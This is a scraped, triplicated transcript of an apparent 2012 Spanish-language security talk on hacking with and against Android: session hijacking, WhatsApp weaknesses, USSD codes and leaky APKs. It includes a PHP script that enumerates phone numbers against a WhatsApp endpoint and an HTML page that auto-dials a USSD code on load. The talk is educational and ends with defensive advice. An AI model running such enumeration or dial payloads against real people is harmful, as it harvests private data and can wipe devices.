presentación de powerpoint - | blog de omar android... · script para la verificación de usuarios...
TRANSCRIPT
![Page 1: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/1.jpg)
DISCLAIMER
Todo el contenido de esta charla es resultado de investigacioacuten con
fines didaacutecticos y educativos El autor no se hace responsable por el
uso del conocimiento contenido en la siguiente presentacioacuten La
informacioacuten contenida debe ser utilizada uacutenicamente para fines eacuteticos
y con la debida autorizacioacuten
Todo descubrimiento realizado ha sido y seraacute usado de forma legal
La audiencia debe asumir todo lo que se exponga hoy como ldquofalsordquo y
ldquosin fundamentordquo hasta que lo compruebe personalmente Limahack
no es el autor directo de ninguno de los descubrimientos expuestos
ni de las herramientas demostradas ni los conoce
Todas las opiniones vertidas durante esta presentacioacuten son
exclusivas del expositor Limahack no es responsable de ninguna de
las opiniones vertidas
aula H4XOR O
mar Palo
min
o
Android mobile hacking
ataques y atacando con el androide
iquestPor queacute Android Ataques a Sistemas Operativos Windows - Linux Ataques a redes LAN desde Android Atacando a sistemas Android
iquestQuieacuten soy
bull Ing Sistemas y Maestrista de Ing de
Computacioacuten y Sistemas
bull Certificado CEHv7 Security+ ITILv3
bull Consultor en Seguridad de informacioacuten
bull Psicoacutelogo que aun no comienza sus
estudioshellip
bull Escritor en mis tiempos libres
httpwwwel-palomocom
httpwwwfacebookcomElPalomoSeguridadInformacion
omarc320gmailcom
iquestPor queacute Android
68
17
5 4 4
2 0
Participacioacuten en el mercado de Sistemas Operativos moacuteviles
Android
IOS
Blackberry
Symbian
Windows
Linux
Otros
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 2: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/2.jpg)
aula H4XOR O
mar Palo
min
o
Android mobile hacking
ataques y atacando con el androide
iquestPor queacute Android Ataques a Sistemas Operativos Windows - Linux Ataques a redes LAN desde Android Atacando a sistemas Android
iquestQuieacuten soy
bull Ing Sistemas y Maestrista de Ing de
Computacioacuten y Sistemas
bull Certificado CEHv7 Security+ ITILv3
bull Consultor en Seguridad de informacioacuten
bull Psicoacutelogo que aun no comienza sus
estudioshellip
bull Escritor en mis tiempos libres
httpwwwel-palomocom
httpwwwfacebookcomElPalomoSeguridadInformacion
omarc320gmailcom
iquestPor queacute Android
68
17
5 4 4
2 0
Participacioacuten en el mercado de Sistemas Operativos moacuteviles
Android
IOS
Blackberry
Symbian
Windows
Linux
Otros
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 3: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/3.jpg)
iquestQuieacuten soy
bull Ing Sistemas y Maestrista de Ing de
Computacioacuten y Sistemas
bull Certificado CEHv7 Security+ ITILv3
bull Consultor en Seguridad de informacioacuten
bull Psicoacutelogo que aun no comienza sus
estudioshellip
bull Escritor en mis tiempos libres
httpwwwel-palomocom
httpwwwfacebookcomElPalomoSeguridadInformacion
omarc320gmailcom
iquestPor queacute Android
68
17
5 4 4
2 0
Participacioacuten en el mercado de Sistemas Operativos moacuteviles
Android
IOS
Blackberry
Symbian
Windows
Linux
Otros
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
